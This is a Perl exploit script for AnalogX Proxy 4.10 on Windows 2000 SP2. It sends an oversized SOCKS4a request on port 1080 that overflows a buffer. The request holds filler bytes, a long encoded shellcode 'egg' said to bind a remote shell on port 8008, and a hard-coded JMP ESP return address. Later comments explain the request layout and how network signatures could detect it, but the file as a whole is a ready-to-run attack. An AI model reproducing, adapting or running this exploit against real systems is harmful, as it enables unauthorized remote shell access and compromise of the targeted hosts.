#!/usr/local/bin/perl

# PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
#modified by Sballo the super mega h4x0r that the "system" system calls To Code EveryThing :)
#
# binds a Shell on 8008
#

use Socket;

# Argument check: exactly one argument (the target host) is required.
# Anything else prints the banner and a usage line, then exits with status 1.
if (@ARGV != 1){
print " AnalogX Proxy Version 4.10 exploit for Japanese(English) Windows 2000 Pro (SP2)
 written by Kanatoko <anvil\@jumperz.net>
 http://www.jumperz.net/
 Modified by J0zLame
 Spawns a  Shell on port 8008
 thanx to: hsj (http://hsj.shadowpenguin.org/)
 Mod-Thanks to (|Zan  http://www.deepzone.org/)";

print "\n\n./$0 <AnaloX-Server-IP>\n";exit(1);}

# Connection setup: resolve the host from the command line and open a plain
# TCP connection to port 1080 (the conventional SOCKS port).  Everything below
# uses the package-global bareword handle SOCKET.
$connect_host = $ARGV[0];
$port = 1080;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
# Enable autoflush on SOCKET, then make STDOUT the default output handle
# again so the single print to SOCKET at the end is not held in a buffer.
select(SOCKET); $|=1; select(STDOUT);


#the old egg
        # egg written by UNYUN (http://www.shadowpenguin.org/)
        # 57bytes
#$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
#$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
#$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
#$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
#$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
#$egg .= "notepad.exe";





#########################################
# Modified payload ("egg") that is embedded in the request built further down.
# The file header says it is intended to bind a shell on TCP/8008.  The bytes
# are hand-assembled and are not annotated here; nothing in this script reads
# anything back from the target, so it gives no indication of the outcome.
$egg  ="\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41";
$egg .="\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f";
$egg .="\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04";
$egg .="\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e";
$egg .="\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32";
$egg .="\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99";
$egg .="\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c";
$egg .="\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9";
$egg .="\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71";
$egg .="\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9";
$egg .="\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93";
$egg .="\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99";
$egg .="\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99";
$egg .="\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14";
$egg .="\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17";
$egg .="\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d";
$egg .="\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99";
$egg .="\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66";
$egg .="\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d";
$egg .="\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7";
$egg .="\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9";
$egg .="\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9";
$egg .="\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a";
$egg .="\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14";
$egg .="\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87";
$egg .="\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9";
$egg .="\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32";
$egg .="\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99";
$egg .="\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98";
$egg .="\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf";
$egg .="\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99";
$egg .="\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3";
$egg .="\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3";
$egg .="\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99";
$egg .="\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99";
$egg .="\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13";
$egg .="\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9";
$egg .="\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2";
$egg .="\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf";
$egg .="\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a";
$egg .="\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c";
$egg .="\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d";
$egg .="\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9";
$egg .="\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa";
$egg .="\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce";
$egg .="\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99";
$egg .="\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3";
$egg .="\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4";
$egg .="\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07";
$egg .="\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c";
$egg .="\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03";
$egg .="\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a";
$egg .="\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b";
$egg .="\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07";
$egg .="\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97";
$egg .="\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9";
$egg .="\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c";
$egg .="\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9";
$egg .="\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99";
$egg .="\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9";
$egg .="\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66";
$egg .="\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d";
$egg .="\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d";
$egg .="\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9";
$egg .="\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99";
$egg .="\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce";
$egg .="\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a";
$egg .="\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9";
$egg .="\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99";
$egg .="\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1";
$egg .="\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d";
$egg .="\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9";
$egg .="\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99";
$egg .="\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14";
$egg .="\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c";
$egg .="\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a";
$egg .="\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9";
$egg .="\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99";
$egg .="\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12";
$egg .="\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a";
$egg .="\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9";
$egg .="\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a";
$egg .="\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34";
$egg .="\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99";
$egg .="\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1";
$egg .="\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2";
$egg .="\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38";
$egg .="\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59";
$egg .="\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce";
$egg .="\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6";
$egg .="\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd";
$egg .="\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8";
$egg .="\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7";
$egg .="\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5";
$egg .="\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed";
$egg .="\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab";
$egg .="\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0";
$egg .="\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8";
$egg .="\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8";
$egg .="\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb";
$egg .="\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc";
$egg .="\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0";
$egg .="\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5";
$egg .="\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8";
$egg .="\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0";
$egg .="\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5";
$egg .="\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc";
$egg .="\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1";
$egg .="\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99";
$egg .="\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc";
$egg .="\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90";;
#####################################################################


# Request layout.  The first eight bytes are a SOCKS4 request header:
# VN=0x04, CD=0x01 (CONNECT), DSTPORT=0x0019, DSTIP=0.0.0.1.  A DSTIP of the
# form 0.0.0.x is the SOCKS4a convention that a hostname follows the USERID.
# The two NUL-terminated fields that follow (USERID, then hostname) are filled
# with filler bytes, the egg and the address material noted below, so the
# request is far longer than a normal SOCKS4 CONNECT and carries non-printable
# bytes in text fields -- the properties a network signature for this traffic
# would key on.
$buf  = "\x04\x01\x00\x19\x00\x00\x00\x01";
$buf .= "A" x 32;                     # USERID field: 32 bytes of filler ...
$buf .= $egg;                         # ... followed by the payload built above ...
$buf .="\x8c\x3e\x1d\x01";            # ... and four literal bytes (not documented in the original)
$buf .= "\x00";                       # NUL terminates the USERID field
$buf .= "A" x 144;                    # hostname field: 144 bytes of filler

	#
        # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
        # If you use English Windows 2000, try 0x77E2492B
#$buf .= "\x2B\x49\xdf\x77";
$buf .= "\x77\xE2\x49\x2B";           # the 0x77E2492B value from the note above
        # JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";                       # NUL terminates the hostname field

#
# Pause before sending (original author's choice; the reason is not recorded).
sleep(3);
# One write of the whole request.  No reply is read and the result of print
# is not checked, so the script reports nothing about what happened remotely.
print SOCKET $buf;

close(SOCKET);